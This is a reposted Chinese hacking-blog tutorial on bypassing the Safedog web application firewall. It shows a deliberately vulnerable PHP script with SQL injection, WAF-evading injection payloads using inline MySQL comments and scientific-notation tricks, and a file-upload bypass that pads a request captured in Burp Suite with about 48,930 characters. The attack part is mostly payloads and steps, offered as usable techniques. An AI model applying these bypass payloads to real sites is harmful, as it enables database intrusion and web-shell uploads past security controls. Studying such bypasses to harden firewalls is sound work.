安全狗SQL注入、上传绕过-2017-3-23

发布于 / 中文文章 / 0 条评论

作者是谁不清楚,看到群里分享出来的,所以转载到博客了。—–收集整理 by: www.nvhack.com

安全狗SQL注入、上传绕过-2017-3-23

安全狗SQL注入绕过

  • 测试文件,明显的字符型 SQL 注入
-----------------------------
'; $res = mysql_query($sql); while ( $rows = mysql_fetch_array($res)) { echo $rows[0]; echo $rows[1]; echo $rows[2]; } ?>
  • 正常运行界面

安全狗SQL注入、上传绕过-2017-3-23

  • 添加注入测试语句
http://localhost/waf123.php?id=3' and 1=1 --+

安全狗SQL注入、上传绕过-2017-3-23

  • 修改测试语句
http://localhost/waf123.php?id=3'/*!and*/%202e1/**/=2e1--+

安全狗SQL注入、上传绕过-2017-3-23-Pikachu Hacker

安全狗SQL注入、上传绕过-2017-3-23-Pikachu Hacker

安全狗SQL注入、上传绕过-2017-3-23

安全狗上传绕过

  • 附上 php 上传脚本源码,此源码未对上传文件类型做校验

安全狗SQL注入、上传绕过-2017-3-23-Pikachu Hacker

安全狗SQL注入、上传绕过-2017-3-23

  • 绕过方法,工具:burpsuite 1,用 php 脚本或者 js,python 等其他语言,生成 48930 个字符

  • 抓包,改包

安全狗SQL注入、上传绕过-2017-3-23

  • 添加后如图

安全狗SQL注入、上传绕过-2017-3-23

  • 查看当前目录,上传成功 1

安全狗SQL注入、上传绕过-2017-3-23

转载原创文章请注明,转载自: Pikachu Hacker » 安全狗SQL注入、上传绕过-2017-3-23
Not Comment Found